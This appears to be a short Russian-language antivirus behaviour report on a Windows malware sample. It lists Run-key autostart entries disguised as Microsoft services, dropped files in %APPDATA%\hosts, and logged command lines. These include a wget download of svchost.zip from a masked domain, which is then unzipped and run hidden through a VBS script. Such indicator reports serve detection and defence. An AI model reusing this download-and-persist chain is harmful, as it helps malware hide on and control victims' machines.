Техническая информация
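Автозапуск (значения в ключе реестра Run текущего пользователя; имена значений стилизованы под службы Microsoft, но указывают на файлы в %APPDATA%\hosts):
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft host status services' = '"%APPDATA%\hosts\status.exe"'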
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft host services' = '"%APPDATA%\hosts\launch.bat"'
Запускаемые процессы (командные строки):
- '%APPDATA%\hosts\status.exe'
- '%APPDATA%\hosts\unzip.exe' svchost.zip
- '%APPDATA%\hosts\wget.exe' http://rg##st.net/download/49074656/89f43ec825751ee8e57ae36169ad88d3a8434b84/svchost.zip
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\hosts\svchost.bat" "
- '<SYSTEM32>\wscript.exe' "%APPDATA%\hosts\invis.vbs" "%APPDATA%\hosts\svchost.bat"
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\hosts\launch.bat" "
Файлы в каталоге %APPDATA%\hosts:
- %APPDATA%\hosts\svchost.bat
- %APPDATA%\hosts\invis.vbs
- %APPDATA%\hosts\logfile.txt
- %APPDATA%\hosts\id.txt
- %APPDATA%\hosts\launch.bat
- %APPDATA%\hosts\unzip.exe
- %APPDATA%\hosts\wget.exe
- %APPDATA%\hosts\svchost.zip
- %APPDATA%\hosts\status.exe
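Сетевая активность (символы ## в имени домена, по-видимому, — маска, поставленная в отчёте; в таком виде домен не годится для точного сопоставления):
- 'rg##st.net':80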
- rg##st.net/download/49074656/89f43ec825751ee8e57ae36169ad88d3a8434b84/svchost.zip
- DNS ASK rg##st.net
Окна (ClassName / WindowName):
- ClassName: 'Indicator' WindowName: '(null)'